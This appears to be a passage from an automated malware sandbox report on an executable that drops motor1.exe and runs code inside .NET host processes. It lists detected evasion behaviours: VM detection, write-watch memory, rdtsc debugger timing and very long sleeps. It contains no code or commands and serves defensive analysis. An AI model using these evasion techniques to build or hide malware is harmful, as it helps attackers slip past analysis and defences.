Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	System information queried: FirmwareTableInformation

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: 22D60E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1380000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2E80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4E80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 48B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 17F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 5310000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: DE0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1080000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1080000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1900000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 32B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 52B0000 memory reserve \| memory write watch
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: 2144D270000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1470000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4D80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4D60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1180000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4F60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 12B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4C40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1210000 memory reserve \| memory write watch

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFD93B71380 rdtsc

4_2_00007FFD93B71380

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 5235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 4537	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\concrt140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\concrt140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	API coverage: 4.1 %
Source: C:\Users\user\SystemRootDoc\motor1.exe	API coverage: 5.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1912	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1912	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5948	Thread sleep count: 5235 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5948	Thread sleep count: 4537 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2032	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\SystemRootDoc\motor1.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
